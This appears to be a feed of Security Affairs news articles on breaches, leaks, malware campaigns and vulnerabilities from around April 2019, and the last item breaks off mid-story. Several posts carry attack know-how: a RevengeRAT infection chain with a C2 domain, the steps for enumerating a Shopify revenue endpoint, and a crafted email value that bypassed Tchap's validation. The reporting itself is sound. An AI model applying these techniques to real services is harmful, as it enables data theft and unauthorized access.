EmCare is owned by Envision Healthcare, it is a leading provider of physician jobs for emergency medicine, inpatient physician services, radiology management programs and other healthcare services.

emcare

It has more than 700 practices at locations ranging from major hospitals and health systems to rural hospitals and ambulatory care centers.

EmCare, Inc. and its affiliates (EmCare) recently became aware that an unauthorized third party obtained access to a number of EmCare employees’ email accounts. EmCare provides physician services.” reads the incident notice published by the company.

“Patients impacted by this incident may have received medical care from a clinician employed by or engaged with an affiliate of EmCare. These services may have been provided in an Emergency Department or as inpatient services in a hospital.”

The company discovered the intrusion on February 19, hackers compromised some employees’ email accounts and gained access to some patients’, employees’ and contractors’ personal information.

“On Feb. 19, 2019, EmCare determined that the impacted email accounts contained some patients’, employees’ and contractors’ personal information, including name, date of birth or age, and for some patients, clinical information. In addition, in some instances, Social Security and driver’s license numbers were impacted.” continues the notice.

At the time of publishing, the company pointed out that there is no evidence to suggest that the information has been misused.

The extent of the security incident is still unclear, we have no information about the number of accounts that were accessed by the intruders. The company did not provide technical details about the hack.

In my humble opinion, the fact that employees were keeping patients’ data unprotected into their email accounts is very disturbing.

EmCare will offer identity protection and credit monitoring services for patients and employees whose Social Security or driver’s license numbers were exposed in the incident.

“As a general precautionary measure, individuals should remain vigilant about protecting themselves against potential fraud or identity theft by, among other things, reviewing their account statements and monitoring credit reports closely.” concludes the notice.

“If individuals detect any suspicious activity on an account, they should promptly notify the financial institution or company with which the account is maintained. They should also promptly report any fraudulent activity or any suspected incidents of identity theft to the proper law enforcement authorities, including the police and their state’s attorney general.”

Pierluigi Paganini

(SecurityAffairs – EmCare, data breach)

The post EmCare reveals patient and employee data were hacked appeared first on Security Affairs.

jQuery JavaScript library flaw opens the doors for attacks on hundreds of millions of websites

The popular jQuery JavaScript library is affected by a rare prototype pollution vulnerability that could allow attackers to modify a JavaScript object’s prototype.

The impact of the issue could be severe considering that the jQuery JavaScript library is currently used on 74 percent of websites online, most sites still use the 1.x and 2.x versions of the library that are affected by the ‘Prototype Pollution’ vulnerability.

This week the library has received a security patch to address the issue, this week, three years after the last major security flaw discovered in its code.

JavaScript objects are like variables that can be used to store multiple values based on a predefined structure. Prototypes are used to define a JavaScript object’s default structure and default values, they are essential to specify an expected structure when no values are set.

An attacker that is able to modify a JavaScript object prototype can make an application crash and change behavior if it doesn’t receive the expected values.

jQuery JavaScript library

Due to the diffusion of JavaScript, the exploitation of prototype pollution flaws could have serious consequences on web applications.

The vulnerability in the jQuery library (CVE-2019-11358) was discovered by researchers at Snyk that also published a proof of concept code for a prototype pollution attack.

“This security vulnerability referred to and manifests as prototype pollution, enables attackers to overwrite a JavaScript application object prototype.” reads the analysis published by Snyk. “When that happens, properties that are controlled by the attacker can be injected into objects and then either lead to denial of service by triggering JavaScript exceptions, or tamper with the application source code to force the code path that the attacker injects. “

The experts demonstrated that exploiting the flaw attackers can assign themselves admin rights on a web app that uses the jQuery library code.

Fortunately, according to the experts, this prototype pollution issue is not exploitable for mass-attacks because the exploit code must be crafted for each specific target.

Web developers using jQuery JavaScript library for their applications are advised to update their projects to the latest jQuery version, v3.4.0.

“jQuery 3.4.0 includes a fix for some unintended behavior when using jQuery.extend(true, {}, …). If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype. This fix is included in jQuery 3.4.0, but patch diffs exist to patch previous jQuery versions,” reads the blog post published by the jQuery team.

Pierluigi Paganini

(SecurityAffairs – hacking, jQuery JavaScript library )


The post jQuery JavaScript library flaw opens the doors for attacks on hundreds of millions of websites appeared first on Security Affairs.

Russian Twitter bot activity increased in the wake Mueller report release

Experts at security firm SafeGuard reported that Russian Twitter bot activity raised up by 286 percent in the wake of the release of the Mueller Report. Experts at security firm SafeGuard reported that Russian Twitter bot activity raised up by 286 percent in the wake of the release of the Mueller Report.

Social media platforms like Twitter are key components of misinformation campaigns carried out by nation-state actors, today we discuss Twitter bot activity after the release of the Mueller report.

Experts at security firm SafeGuard reported that Russian Twitter bot activity raised up by 286 percent in the wake of the release of the Mueller Report. The company already tracked over 600,000 known bots and trolls.

The experts also observed a significant increase in the number of unique bots and trolls (+48%) from the previous day, a circumstance that suggests the involvement of an army of dormant Twitter bot accounts previously created.

Thousands of Twitter bot accounts were used by the Russian propaganda machine to influence the sentiment of netizens on the content of the Mueller Report.

Experts observed a spike in the use of hashtags related to the Mueller Report in messages published by Russian-linked bots and trolls. We are in the middle of a complex and coordinated misinformation campaign.

According to George Kamide, Director at SafeGuard Cyber, Twitter bot and troll hashtag use increased 852 percent overall. The experts observed a 5,000 percent increase in usage for the #mueller hashtag.

Below the top five hashtags used in the disinformation campaign launched just after the publication of the Mueller Report.

Mueller Report twitter-bot-hashtags

The SafeGuard Cyber director uses 52 risk signatures to classify bad actors into four behavior modes: malicious, suspicious, disinformation, and bot.

Data collected by SafeGuard confirm the intensification of the presence of Russian bots on Twitter.

In November 2018, Twitter announced to have deleted more than 10,000 accounts managed by bots that were posting messages to influence U.S. Midterm election. In January 2019, the social media platform removed 418 accounts associated with Russian entities.

Pierluigi Paganini

(SecurityAffairs – Twitter, Mueller)

The post Russian Twitter bot activity increased in the wake Mueller report release appeared first on Security Affairs.

Campaign leverages Bit.ly, BlogSpot, and Pastebin to distribute RevengeRAT

Palo Alto Networks Unit 42 researchers uncovered a malicious campaign targeting entities in North America, Europe, Asia, and the Middle East with RevengeRAT.

The campaign was carried out during March, threat actors tracked as
Aggah” used pages hosted on Bit.ly, BlogSpot, and Pastebin as a command-and-control (C2) infrastructure to distribute the RevengeRAT.

Attackers hit organizations in several industries including Technology, Retail, Manufacturing, State/Local Government, Hospitality, Medical, and other Professional business.

“In March 2019, Unit 42 began looking into an attack campaign that appeared to be primarily focused on organizations within a Middle Eastern country.” reads the analysis published by Palo Alto Networks.

“Further analysis revealed that this activity is likely part of a much larger campaign impacting not only that region but also the United States, and throughout Europe and Asia.”

The usage of legitimate services to deliver the malware aims at avoiding detection.

RevengeRAT variants were used by different APT groups, such as The Gorgon Group, that hit entities in the UK, Spain, Russia and in the US. The source code of the RAT has been publicly leaked a few years ago and could be actually part of multiple campaigns conducted by several threat actors. 

RevengeRAT allows to open remote shells on the infected system, manage system files, processes, and services, log keystrokes, edit the Windows Registry, edit the hosts file, dump users passwords, and access the webcam, and many more actions.

Researcher an analyzed a bait document built to load a malicious macro-enabled document from a remote server via Template Injection.

“These macros use BlogSpot posts to obtain a script that uses multiple Pastebin pastes to download additional scripts, which ultimately result in the final payload being RevengeRAT configured with a duckdns[.]org domain for C2.” continues the analysis.

“During our research, we found several related delivery documents that followed the same process to ultimately install RevengeRAT hosted on Pastebin, which suggests the actors used these TTPs throughout their attack campaign.”

Once the victims opened the decoy document, it will display a lure image designed to trick them into turning on Microsoft Office macros to “Enable Editing.” If the victim enables the macros, a remote OLE document containing the malicious macro would be loaded using template injection.

The OLE file loaded an embedded Excel document which would download a malicious script from a shortened URL using the Bit.ly service. In a similar way, the malicious code was also downloaded in other attacks from a Blogspot domain hosting a malicious JavaScript.

“The malicious script carries out several activities on the compromised system. First, it attempts to hamper Microsoft Defender by removing its signature set. The script also kills the Defender process along with the processes for several Office applications.” reads the analysis.

Experts pointed out that the technique of enabling macros and disabling ProtectedView in Office and the tactic of killing processes for Windows Defender and Microsoft Office applications were employed by Gorgon group in past campaigns. 

Once downloaded on a victim’s machine, the script will perform the following main actions:

Downloading a payload from a Pastebin URL
• Creating a scheduled task to periodically obtain and run a script from a Pastebin URL
• Creating an autorun registry key to obtain and run a script from a Pastebin URL

The last stage malware is downloaded from Pastebin, it is a RevengeRAT variant dubbed “Nuclear Explosion” that uses the lulla.duckdns[.]org domain as C2.

RevengeRAT

The analysis of a single bit.ly shortened URL revealed it was clicked over 1,900 times by targets from roughly 20 countries, this data could give us an idea of the extent of the campaign.

The analysis of decoy document’s properties allowed the experts to discover a number of other RevengeRAT samples used in this campaign.

Despite this, the Palo Alto Networks researchers conclude that there is no “concrete evidence that this attack campaign is associated with Gorgon.”

Pierluigi Paganini

(SecurityAffairs – hacking, RevengeRAT)


The post Campaign leverages Bit.ly, BlogSpot, and Pastebin to distribute RevengeRAT appeared first on Security Affairs.

A flaw in Shopify API flaw exposed revenue and traffic data of thousands of stores

Researcher discovered a high-severity flaw in Shopify e-commerce platform that could have been abused to expose the traffic and revenue data for the stores.

Bug bounty hunter Ayoub Fathi. discovered a vulnerability in a Shopify API endpoint that could be exploited to leak the revenue and traffic data of thousands of stores.

The Shopify platform is currently used by 800,000 different online merchants in more than 175 countries.

shopify

The white hat hacker analyzed the APIs published over the past year by Shopify that allow users to fetch sales data for graph presentations. He noticed that the system was leaking the revenue data of two unnamed Shopify stores, one of which had been removed from the platform.

The researcher carried out a mass check on all the existing stores to determine if the platform was affected by a Direct Object Reference (IDOR) issue iterating over $storeName.

Fathi then decided to perform a mass check on all existing stores instead to see if any customer information would leak through the API.

“The first idea that came to mind is to perform a mass check on eventually all existing stores, and see if we would get any customer data out of any.” reads a post published by the researcher.

“The attack process will be as follows:

  • Building a wordlist of store names (from storeName.myshopify.com);
  • Iterate the wordlist against the almost vulnerable endpoint:
/shops/$storeName/revenue_data.json
  • Filtering out the vulnerable domains;
  • Analyzing affected stores to figure out the root cause of the observed behaviour or eventual vulnerability.”

Fathi found that 4 out of 1000 stores (one of which was closed) were vulnerable. The researcher decided to make further test using a larger dataset, containing 813,684 records, using Forward DNS.

“Using this approach, we don’t need to generate store names from a given domain list. Instead, we will be using the FDNS to obtain reverse CNAME records of shops.myshopify.com (which all the stores point to) ” continues the expert. “Now, we will be looking for CNAME records that match shops.myshopify.com where Shopify merchants are hosting their stores.”

The hacker created and exploit.py script to use the new word list composed of 813K store names

Using this approach the expert retrieved a list of vulnerable stores and queried them to get monthly revenue data in USD of the current store during its lifetime.

“This was tested on 800K merchant stores, +12,100 of them were exposed, +8700 were vulnerable stores that we were able to obtain their sales and traffic data and they should not be public, and 3400 are expected to have their sales data public” wrote Fathi “to summarize:

  • This was tested on +800K stores
  • +12,100 were exposed
  • +8700 stores were vulnerable and their data is set to private.
  • Only +3400 stores data was expected to be public.”

The researcher discovered that the leak was caused by the Shopify Exchange App.

“Based on above data and a few more days of research, I came to the conclusion that this was caused by Shopify Exchange App (Actively used by merchants now) which was introduced only a few months before this vulnerability. Any merchant who has Exchange App installed would be vulnerable.” states Fathi.

Fathi reported the flaw to Spotify on 13 October 2018, the company acknowledged it on October 16 and closed the flaw on November 1.

The bad news is that Shopify has not awarded the expert citing policy violations because the expert tested shops not created for testing purposes.

Below an excerpt of the email Shopify sent to the expert:

“While we appreciate you were trying to demonstrate the impact of the identified issue, intentionally accessing information of other merchants and not immediately reporting this to us is of significant concern to Shopify. As a result, this report will not be awarded a bug bounty.”

Pierluigi Paganini

(SecurityAffairs – hacking, VSDC)

The post A flaw in Shopify API flaw exposed revenue and traffic data of thousands of stores appeared first on Security Affairs.

Ride-Hailing Company operating in Iran exposes data of Iranian Drivers

Security researcher discovered a database belonging to a ride-hailing company operating in Iran that was left exposed online containing over 6.7M records.

Security researcher Bob Diachenko discovered a database belonging to a ride-hailing company operating in Iran that was left exposed online without protection.

The MongoDB instance named ‘doroshke-invoice-production‘ contained over 6.7 million records of Iranian drivers.

Exposed records include driver first name and last name, SSN (10-digits Iranian ID number in plain text), phone number, and invoice date.

The expert discovered the database using the BinaryEdge search engine that indexes data available on the internet.

Security researcher Bob Diachenko discovered the database named ‘doroshke-invoice-production’ using BinaryEdge search engine that allows
to scan the entire internet space and acquiring data.

“On April 18th, during our regular security audit of nonSql databases with BinaryEdge search engine, I have discovered an open and publicly available MongoDB instance which contained astonishingly sensitive information on Iranian drivers.” reads a blog post published by the expert.

The database included two collections with invoices split by year:

  • invoice95 (all the invoices from year 1395, which corresponds to 2017 in Gregorian calendar), with total number of records: 740,952
  • invoice96 (all the invoices from year 1396, which corresponds to 2018 in Gregorian calendar), with total number of records: 6,031,317
Iranian Ride-Hailing App data leak

The MongoDB contained a large number of duplicates, the researcher estimates that the unique number of entries is between one and two million.

At the time of writing the owner of the archive is still unknown, fortunately, it has secured the instance.

Diachenko reported its discovery to the Iranian CERT and also attempt to alert researchers in Iran to discover the owner.

“We were able to get in touch with a couple of drivers with an attempt to identify the owner of the database. At the same time, my colleagues have reached out to the biggest ride-hailing companies in Iran to confirm data origin. ” concludes Diachenko.

“While I did not receive an official confirmation or comment from either company, we can only guess if this data was part of their infrastructure. However, no matter who owned it, the fact alone that such highly sensitive PII (personally identifiable information) was available in the wild for at least 3 days, is scary.”

Pierluigi Paganini

(SecurityAffairs – data leak,ride-hailing company)

The post Ride-Hailing Company operating in Iran exposes data of Iranian Drivers appeared first on Security Affairs.

Security Affairs newsletter Round 210 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Attackers hacked support agent to access Microsoft Outlook email accounts
Major coordinated disinformation campaign hit the Lithuanian Defense
Romanian duo convicted of fraud Scheme infecting 400,000 computers
Security Affairs newsletter Round 209 – News of the week
Whatsapp, Instagram, Facebook down worldwide
A new DDoS technique abuses HTML5 Hyperlink Audit Ping in massive attacks
Apache fixed an important RCE flaw in Tomcat application server
Gnosticplayers round 5 – 65 Million+ fresh accounts from 6 security breaches available for sale
Gnosticplayers round 5 – 65 Million+ fresh accounts from 8 security breaches available for sale
Locked Shields 2019 – Chapeau, France wins Cyber Defence Exercise
Yellow Pencil WordPress Plugin flaw expose tens of thousands of sites
Adblock Plus filter can be exploited to execute arbitrary code in web pages
Blue Cross of Idaho data breach, 5,600 customers affected
CVE-2019-0803 Windows flaw exploited to deliver PowerShell Backdoor
Ecuador suffered 40 Million Cyber attacks after the Julian Assange arrest
FireEye releases FLASHMINGO tool to analyze Adobe Flash files
Scranos – A Cross Platform, Rootkit-Enabled Spyware rapidly spreading
A new variant of HawkEye stealer emerges in the threat landscape
Code execution – Evernote
eGobbler hackers used Chrome bug to deliver 500Million+ ads to iOS users
European Commission is not in possession of evidence of issues with Kaspersky products
Justdial is leaking personal details of all customers real-time
RCE flaw in Electronic Arts Origin client exposes gamers to hack
Analyzing OilRigs malware that uses DNS Tunneling
APT28 and Upcoming Elections: evidence of possible interference (Part II)
Cisco addresses a critical bug in ASR 9000 series Routers
Drupal patched security vulnerabilities in Symfony, jQuery
Facebook ‘unintentionally collected contacts from 1.5 Million email accounts without permission
Russian TA505 threat actor target financial entities worldwide
Broadcom WiFi Driver bugs expose devices to hack
Facebook admitted to have stored millions of Instagram users passwords in plaintext
Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison
Ransomware attack knocks Weather Channel off the Air
Source code of tools used by OilRig APT leaked on Telegram
Avast, Avira, Sophos and other antivirus solutions show problems after
Google is going to block logins from embedded browsers against MitM phishing attacks
Hacker broke into super secure French Governments Messaging App Tchap hours after release
Marcus Hutchins pleads guilty to two counts of banking malware creation

Pierluigi Paganini

(SecurityAffairs – newsletter)



The post Security Affairs newsletter Round 210 – News of the week appeared first on Security Affairs.

60 Million records of LinkedIn users exposed online

Researcher discovered eight unsecured databases exposed online that contained approximately 60 million records of LinkedIn user data.

Researcher Sanyam Jain at GDI foundation discovered eight unsecured databases exposed online that contained approximately 60 million records of LinkedIn user data.

Most of the data are publicly available, the databases also include the email addresses of the users. The databases also contain internal data, such as the type of LinkedIn subscription a circumstance that suggests that the source could be a data breach.

Records include LinkedIn public profile information, including IDs, profile URLs, work history, education history, location, listed skills, other social profiles, and the last time the profile was updated.

The archives contain 229 GB of data, each one containing between 25 GB and 32 GB of information. 

The researcher noticed that the huge trove of data was disappearing and reappearing online under different IP addresses every day.

Finally, the database was no more accessible likely because it was secured.

The mystery behind this discovery is that some users claim to have had
LinkedIn privacy setting configured to avoid publicly displaying some personal details.

“Included in the profile was also my email address that I used when registering my LinkedIn account. It is not known how they gained access to this information as I have always had the LinkedIn privacy setting configured to not publicly display my email address.” reads the post published by BleepingComputer.

“After reviewing the data that was sent to me, I found all of the information to be accurate.”

LinkedIn data leaked

At the time it is not clear who is the owner of the database, as of Monday, the databases were no longer accessible online.

Paul Rockwell, head of Trust & Safety at LinkedIn, told BleepingComputer that the databases do not belong to them, anyway he confirmed that the company is aware of third-party databases containing scraped LinkedIn data.

Pierluigi Paganini

(SecurityAffairs – hacking, LinkedIn)

The post 60 Million records of LinkedIn users exposed online appeared first on Security Affairs.

INPIVX hidden service, a new way to organize ransomware attacks

A new service called Inpivx represents the evolution of the ransomware-as-a-service making it very easy for wannabe crooks to develop their malware and build a management panel.

A new Tor hidden service called Inpivx evolves the concept of the ransomware-as-a-service making it very easy for crooks without technical skills to develop their own malware and build a management panel.

Operators behind the service offer for sale the source code for the ransomware and for the management dashboard. The availability of the source code allows crooks to customize their ransomware.

Watch out, Inpivx is not a RaaS and for this reason, it does not supply hosting services.

The ransomware is written in C++ and supports almost any Windows OS version, from Windows XP through Windows 10, while the dashboard is coded in PHP.

The package goes for $500, it also includes the decryption tool, operators also provide a detailed tutorial.

“If the client has no skill, we provide a tutorial based on our own ransomware dashboard each line of code has an explanation,” an Inpivx member told BleepingComputer.

The dashboard provides infection data in real time, it includes the total number of encrypted files, number of infections, the operating systems of the infected machines and their geographical distribution.

It also implements a chat that allows operators to communicate with the victims.

A specific clients section includes information on infected machines, such as the victim IDs, the operating system, the ransom price, the decryption key, and the payment status.

“Inpivx approach is highly likely to attract to the ransomware game individuals with expertise in other areas of the crime business.” wrote Ionut Ilascu from BleepingComputer. “With access to the source code, they can alter the original ransomware product and create new strains that could evolve to something new by combining code from other malware.”

Pierluigi Paganini

(SecurityAffairs – Tor, Inpivx)

The post INPIVX hidden service, a new way to organize ransomware attacks appeared first on Security Affairs.

Marcus Hutchins pleads guilty to two counts of banking malware creation

British malware researcher Marcus Hutchins has pleaded guilty to developing and sharing the banking malware between July 2014 and July 2015.

The popular British cybersecurity expert Marcus Hutchins has pleaded guilty to developing and sharing the Kronos banking malware
between July 2014 and July 2015.

Marcus Hutchins, also known as MalwareTech, made the headlines after discovering the “kill switch” that halted the outbreak of the WannaCry ransomware. In August 2017, he was arrested in Las Vegas after attending the Def Con hacking conference and was detained by the FBI in the state of Nevada.

In August 2017, Marcus Hutchins pleaded not guilty to charges of creating and selling malware at a hearing in Milwaukee, Wisconsin.
The court decided to relax the expert bail terms, allowing him to access the Internet and continues his ordinary working activities. The only restriction on Hutchins is that the expert cannot visit the Wannacry server domain.

The decision is unusual because computer crime suspects are not allowed to stay online.

The court allowed him to live in Los Angeles, where the company that hired him is located, but he was obliged to surrender his passport and he must wear a tracking device until his trial in October.

On Friday, Hutchins accepted a plea deal and admitted two charges of malware development.

“I’ve pleaded guilty to two charges related to writing malware in the years prior to my career in security,” reads a statement published by the expert.

“I regret these actions and accept full responsibility for my mistakes. Having grown up, I’ve since been using the same skills that I misused several years ago for constructive purposes. I will continue to devote my time to keeping people safe from malware attacks.”

Marcus Hutchins would face with a maximum penalty of five years in prison a $250,000 fine and a year of probation.

According to the Federal law enforcement, the researchers told an unnamed associate over a recorded telephone line: “I used to write malware, they picked me up on some old shit,” “I wrote code for a guy a while back who then incorporated it into a banking malware.”

Pierluigi Paganini

(Security Affairs – Marcus Hutchins, cybercrime)

The post Marcus Hutchins pleads guilty to two counts of banking malware creation appeared first on Security Affairs.

Avast, Avira, Sophos and other antivirus solutions show problems after

Antivirus solutions from different vendors are having malfunctions after the installation of Windows security patches released on April 9, including McAfee, Avast and Sophos.

Antivirus solutions from different vendors are showing malfunctions after the installation of Windows security patches released on April 9.

Antivirus solutions from Sophos, Avira, ArcaBit, Avast, and recently McAfee reported security issues after the installation of the fixes released by Microsoft.

Microsoft is aware of the problems reported by its users with their antivirus solutions and already included several antivirus software to the list of known issues.

Users of the affected machines are observing sudden system freezes and performance degradation.

In some cases, users of systems running Windows 7, 8.1, Server 2008 R2, Server 2012, and Server 2012 R2 reported that they were able to log in, but the process takes more than ten hours.

antivirus

Experts observed that safe mode is not affected by the issues, experts suggest to run in safe mode to disable the antivirus and allow the machines to boot without problems.

“Sophos additionally reports that adding the antivirus software’s own directory to the list of excluded locations also serves as a fix, which is a little strange.” reported ArsTechnica.

“Avast recommends leaving systems at the login screen for about 15 minutes and then rebooting; the antivirus software should then update itself automatically in the background.”

Update for Sophos, Avira, and ArcaBit users, have been blocked by Microsoft. McAfee is investigating the issue, while ArcaBit and Avast already released updates that address the problem.

According to experts at Avast and McAfee, the root cause of the problem is the change that Microsoft made to CSRSS (“client/server runtime subsystem”) component that manages Win32 applications. The experts believe that antivirus solutions are blocked while attempting to access some resource.

At the time it was difficult to understand what has happened and if the problem could definitively be solved by applying antivirus updates of fixes of the operating system.

Pierluigi Paganini

(SecurityAffairs – hacking, antivirus)

The post Avast, Avira, Sophos and other antivirus solutions show problems after appeared first on Security Affairs.

Google is going to block logins from embedded browsers against MitM phishing attacks

Google this week announced that it is going to block login attempts from embedded browser frameworks to prevent man-in-the-middle (MiTM) phishing attacks.

Phishing attacks carried out by injecting malicious content in legitimate traffic are difficult to detect when attackers use an embedded browser framework or any other automated tool for authentication.

For example, the embedded browser framework Google offers Chromium Embedded Framework (CEF) that allows embedding Chromium-based browsers in other applications.

Google announced that starting from June, it will block sign-ins from these frameworks.

“However, one form of phishing, known as “man in the middle” (MITM), is hard to detect when an embedded browser framework (e.g., Chromium Embedded Framework – CEF) or another automation platform is being used for authentication. MITM intercepts the communications between a user and Google in real-time to gather the user’s credentials (including the second factor in some cases) and sign in.” reads a blog post published by Google. “Because we can’t differentiate between a legitimate sign in and a MITM attack on these platforms, we will be blocking sign-ins from embedded browser frameworks starting in June. This is similar to the restriction on webview sign-ins announced in April 2016.”

Google security MiTM

Google suggests developers currently using CEF for authentication to switch to the browser-based OAuth authentication.

The browser-based OAuth authentication also allows users to see the full URL of the page where they are entering their credentials, this could help them to avoid phishing websites mimicking legit ones.

“The solution for developers currently using CEF for authentication is the same: browser-based OAuth authentication. Aside from being secure, it also enables users to see the full URL of the page where they are entering their credentials, reinforcing good anti-phishing practices,” continues Google.

“If you are a developer with an app that requires access to Google Account data, switch to using browser-based OAuth authentication today.”

Pierluigi Paganini

(SecurityAffairs – hacking, MiTM phishing attack)

The post Google is going to block logins from embedded browsers against MitM phishing attacks appeared first on Security Affairs.

Hacker broke into super secure French Government’s Messaging App Tchap hours after release

A white hat hacker discovered how to break Tchap, a new secure messaging app launched by the French government for officials and politicians.

The popular French white hat hacker Robert Baptiste (aka @fs0c131y) discovered how to break into Tchap, a new secure messaging app launched by the French government for encrypted communications between officials and politicians.
The app was developed by DINSIC (Interministerial Directorate of Digital and Information System and Communication of the State), as a project controlled by France’s National Cybersecurity Agency (ANSSI).

It aims at replacing popular instant messaging services like Telegram and WhatsApp for government people.

The Tchap was launched on April 18 and is available on the official iOS and Android app stores, but only French government employees (using
@gouv.fr or @elysee.fr email accounts) can sign-up for an account.

The key point Tchap is that encrypted communications flow through internal servers to prevent cyber attacks carried out by foreign nation-state actors.

Anyway, the French government published Tchap’s source code on GitHub, it is based on Riot, a well-known open-source instant messaging client-server package.

News of the day is that Robert Baptiste found a security bug that could allow anyone to sign up an account with the Tchap app and access groups and channels without using an official government email account.

The expert made a dynamic analysis of the mobile app and discovered it implements certificate pinning in the authentication process. Even if he disables it with Frida, during the registration process, the app requests a token.

tchap

The expert noticed that depending on the email address provided by the user, the app will refer the “correct” id_server. The list of available servers is defined in the AndroidManifest.xml.

“I set id_server to matrix.agent.elysee.tchap.gouv.fr. For info, Elysée is the French presidential palace. As I choose this server I guessed I should have an @elysee.fr email address. So, in the requestToken request, I modified email to fs0c131y@protonmail.com@elysee.fr. Hum, no validation email in my inbox… Wait, maybe it is waiting a known @elysee.fr email address. So I did a Google search “email @elysee.fr”” wrote the expert in a blog post.

“So I did another try and in the requestToken request and I modified email to fs0c131y@protonmail.com@presidence@elysee.fr. Bingo! I received an email from Tchap, I was able to validate my account! “

The expert demonstrated how to create an account with the service using a regular email ID by exploiting a potential email validation vulnerability in the Android version of the Tchap app.

After he logged as an Elysée employee, he was able to access to the public rooms.

tchap app

Robert reported the issue the Matrix team who developed the Riot client, and it quickly fixed the bug and released a patch. The released patch was specific only to the application developed by French intelligence.

Just for curiosity, last week Matrix.org warned users of a security breach, a hacker gained unauthorized access to the production databases, including unencrypted message data, access tokens, and also password hashes.

According to Matrix.org, the attacker has exploited a known vulnerability in the Jenkins open source automation server to hijack credentials and gain access to the systems of the organization. Homeservers, source code and packages, identity servers, and Modular.im servers were not impacted.

Pierluigi Paganini

(SecurityAffairs – hacking, Tchap app)

The post Hacker broke into super secure French Government’s Messaging App Tchap hours after release appeared first on Security Affairs.

Facebook admitted to have stored millions of Instagram users’ passwords in plaintext

Other problems for Facebook that admitted to have stored millions of Instagram users’ passwords in plaintext

Yesterday, Facebook made the headlines once again for alleged violations of the privacy of its users, the company admitted to have ‘unintentionally’ collected contacts from 1.5 Million email accounts without permission

In March, Facebook admitted to have stored the passwords of hundreds of millions of users in plain text, including “tens of thousands” passwords belonging to Instagram users as well.

Unfortunately the issue was bigger than initially reported, the company updated the initial press release confirming that millions of Instagram users were affected by the problem.

The disconcerting discovery was made in January by Facebook IT staff as part of a routine security review. The passwords were stored in plain text on internal data storage systems, this means that they were accessible only by employees.

Facebook quickly fixed the issue and notified the affected users.

Now Facebook confirmed to have discovered “additional logs of Instagram passwords” stored in a readable format. The social network giant pointed out that the passwords were never “abused or improperly accessed” by any of its employees.

Since this post was published, we discovered additional logs of Instagram passwords being stored in a readable format. We now estimate that this issue impacted millions of Instagram users. We will be notifying these users as we did the others. Our investigation has determined that these stored passwords were not internally abused or improperly accessed).” reads the updated statement.

instagram

Summarizing, millions of Instagram users had their account passwords stored in plain text and searchable by thousands of Facebook employees.

Let me suggest to change your password using strong ones and enable the
two-factor authentication.

Pierluigi Paganini

(SecurityAffairs – Instagram, privacy)

The post Facebook admitted to have stored millions of Instagram users’ passwords in plaintext appeared first on Security Affairs.

Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison

Djevair Ametovski was sentenced to 90 months in prison for operating an international cybercrime marketplace named Codeshop.

Macedonian national Djevair Ametovski (32) was sentenced to 90 months in prison by US DoJ authorities for operating an international cybercrime marketplace named Codeshop.

Codeshop.su was a website that specialized in selling stolen payment card data. Ametovski acquired payment card data from hackers who had stolen it from financial institutions and individuals.

According to the investigators, the man commercialized data of 181,000 payment cards between 2010 and 2014.

CodeShop carding

Ametovski (known online as Codeshop, Sindromx, xhevo, and Sindrom) was arrested by Slovenian authorities in January 2014, at the time he was charged with aggravated identity theft, access device fraud conspiracy, and wire fraud conspiracy. The Macedonian citizen was extradited to the United States in May 2016.

The man pleaded guilty to access device fraud and aggravated identity theft, he was also ordered to forfeit $250,000 and pay restitution that will be determined later.

Codeshop customers were able to buy stolen card data searching for specific types of data based on criteria such as country, bank, and bank identification number.

“The stolen data could then be used to make online purchases and to encode plastic cards to withdraw cash at ATMs.” reads the press release the Justice Department.      

“Ametovski used a network of online money exchangers and anonymous digital currencies, including Bitcoin, to reap revenues from the Codeshop website and to conceal all participants’ identities, including his own.  Over the course of the scheme, Ametovski obtained and sold stolen credit and debit card data for more than 1.3 million cards,” said the Justice Department.      

Pierluigi Paganini

(SecurityAffairs – Codeshop, carding)

The post Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison appeared first on Security Affairs.

Source code of tools used by OilRig APT leaked on Telegram

Lab Dookhtegan hackers leaked details about operations carried out by Iran-linked OilRig group, including source code of 6 tools.

A hacker group that goes online with the name Lab Dookhtegan have disclosed details about operations conducted by the Iran-linked cyber-espionage group tracked as OilRig, APT34, and HelixKitten.

OilRig is an Iran-linked APT group that has been around since at least 2014, it targeted mainly organizations in the financial, government, energy, telecoms and chemical sectors in the United States and Middle Eastern countries.

The Lab Dookhtegan hackers used a Telegram channel to dump information about the OilRig infrastructure, revealing details about its hacking tools, members, and operations. The hackers also disclosed IP addresses and domains involved in operations conducted by the group over the years.

OilRig dump
Source ZDnet
OilRig dump
Source ZDnet

It seems that the tools have been leaked since mid-March on a Telegram channel by a user with the Lab Dookhtegan pseudonym.

The dump also includes OilRig victims’ data, including login credentials to several services obtained through phishing attacks.

The entity that leaked the information aimed at disrupting the operations of the Iran-linked hacking groups, it is likely an opponent of the Regime.

Lab Dookhtegan leaked the source code of the following six hacking tools, including data related on their contained in the compromised admin panels:

  • Glimpse (aka BondUpdater), the latest version of the PowerShell-based trojan;
  • PoisonFrog, an older version of BondUpdater;
  • HyperShell web shell (aka TwoFace);
  • HighShell web shell;
  • Fox Panel phishing tool;
  • Webmask, the main tool behind DNSpionage;

According to Chronicle, Dookhtegan leaked data from 66 victims in private industry and Government organizations, most from the Middle East, Africa, East Asia, and Europe.

The list of victims includes Etihad Airways and Emirates National Oil, hackers hit individuals in many industries including energy, transportation, and financial.

Lab Dookhtegan also doxxed Iranian Ministry of Intelligence officers, the leaked shared phone numbers, images, social media profiles, and names of officers involved with APT34 operations.

“We have more secret information about the crimes of the Iranian Ministry of Intelligence and its managers and we are determined to continue to expose them,” Dookhtegan said in a Telegram.

No doubt, the leak will have a severe impact on the future operations of the OilRig group.

Pierluigi Paganini

(SecurityAffairs – hacking, OilRig)

The post Source code of tools used by OilRig APT leaked on Telegram appeared first on Security Affairs.

Ransomware attack knocks Weather Channel off the Air

A ransomware attack knocked the Weather Channel off the air for at least 90 minutes Thursday morning, federal law enforcement are investigating the incident.A ranomware attack knocked the Weather Channel off the air for at least 90 minutes Thursday morning, federal law enforcement are investigating the incident.

A cyber attack hit the Weather Channel and forced it off the air for at least 90 minutes.

The broadcaster confirmed via Twitter that the incident is the result of a cyber attack, it claims that the problems were caused by “a malicious software attack on the network.”

